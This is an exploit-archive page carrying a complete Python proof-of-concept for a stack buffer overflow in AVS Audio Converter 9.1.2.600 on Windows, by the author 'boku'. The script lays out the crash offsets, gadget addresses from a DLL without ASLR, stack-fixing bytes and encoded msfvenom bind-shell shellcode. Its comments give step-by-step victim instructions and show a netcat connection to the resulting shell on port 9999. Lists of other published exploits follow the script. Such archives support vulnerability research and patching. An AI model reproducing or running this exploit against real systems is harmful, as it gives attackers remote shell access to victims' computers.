Menu

Search for hundreds of thousands of exploits

"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)"

Author

Exploit author

boku

Platform

Exploit platform

windows

Release date

Exploit published date

2019-12-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: December 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
#            Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601

#!/usr/bin/python
# Recreate:
#   1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
#   2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
#   3) Install & Open AVS Audio Converter 9.1.2.600.
#   4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
#   5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
#   6) Click the 'Browse...' button; to the right of the textbox.
#      - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red   error   bullet
File = 'bind9999.txt'
try:
    # 0x00400000 [AVSAudioConverter.exe]
    #   9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
    #   - The only module that has SafeSEH disabled.
    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
    #   0x00400000 | 0x00f33000 | False  | False   | False |  False   | False  | 
    #   - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
    offEdx  = '\x41'*260
    edx     = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242
    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
    nSEH    = '\x42'*4
    SEH     = '\x43'*4
    # - If address at offset 308 is not readable, then the program will throw an exception at:
    #   75F9ECE7    3806            cmp byte ptr ds:[esi], al
    #   [!] Access violation when reading [esi] 
    # - If we can get past this exception, we can overwrite EIP at offset 304.
    # - [esi] must be successfully overwriten so we can put our payload after it.
    offEip  = '\x45'*32
    # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled. 
    # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump 
    #    to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
    # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
    #   ECX=0018FA60  ESP=0018FA60 (Stack locations will vary)
    #        0018FA54   45454545  EEEE // [296]
    #        0018FA58   45454545  EEEE // [300]
    #        0018FA5C   1006563E  V... // [304] eip var # Pointer to 'pop+ret'
    #       *0018FA60   00000000  .... // [308] esi var # our esi address gets replaced by 4 nulls
    #        0018FA64   1006A438  8... // [312] jmpEsp var # Pointer to 'jmp esp'
    #        0018FA68   E510EC10  .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
    # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll) 
    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
    #   0x10000000 | 0x100a1000 | False  | True    | False |  False   | False  | 
    # 0x1006563e : pop esi # ret  | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    eip      = '\x3e\x56\x06\x10' # pop+ret
    # - After pop+ret, ESP=0018FA68
    esi      = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW
    #   0x1006a438 : jmp esp |  {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    # - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
    jmpEsp   = '\x38\xa4\x06\x10' # jmp esp pointer
    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
    fixStack = '\x83\xEC\x10'     # sub esp, 0x10
    fixStack += '\x89\xE5'        # mov ebp, esp
    fixStack += '\x83\xEC\x60'    # sub esp, 0x60
    #msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    shellcode =  b""
    shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
    shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
    shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
    shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
    shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
    shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
    shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
    shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
    shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
    shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
    shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
    shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
    shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
    shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
    shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
    shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
    shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
    shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
    shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
    shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
    shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
    shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
    shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
    shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
    shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
    shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
    shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
    shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
    shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
    shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
    shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
    shellcode += b"\x91\xcf\x47"
    payload  = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
    # offsets: 0      260 264  268 272    304 308 312    316      324
    f       = open(File, 'w') # open file for write
    f.write(payload)
    f.close() # close the file
    print blt + File + " created successfully "
#   [email protected]# nc <Victim IP> 9999
#   Microsoft Windows [Version 6.1.7601]
#   C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
    print err + File + ' failed to create'
Release DateTitleTypePlatformAuthor
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
Release DateTitleTypePlatformAuthor
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-12"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-11"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-06"SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-06"Iskysoft Application Framework Service 2.4.3.241 - 'IsAppService' Unquoted Service Path"localwindows"Alejandro Reyes"
2020-03-06"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-06"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path"localwindows"Oscar Flores"
2020-03-05"Exchange Control Panel - Viewstate Deserialization (Metasploit)"remotewindowsMetasploit
2020-03-03"Microsoft Windows - 'WizardOpium' Local Privilege Escalation"localwindowspiotrflorczyk
2020-03-02"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution"remotewindowsPhotubias
2020-03-02"CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow"remotewindowswetw0rk
2020-03-02"Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH)"localwindows"Andrey Stoykov"
2020-03-02"Wing FTP Server 6.2.3 - Privilege Escalation"localwindows"Cary Hooper"
Release DateTitleTypePlatformAuthor
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-01-27"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)"localwindowsboku
2020-01-23"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)"doswindowsboku
2019-12-30"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)"localwindowsboku
2019-12-30"Domain Quester Pro 6.02 - Stack Overflow (SEH)"localwindowsboku
2019-12-30"FTP Navigator 8.03 - Stack Overflow (SEH)"localwindowsboku
2019-12-13"FTP Commander Pro 8.03 - Local Stack Overflow"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47810/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse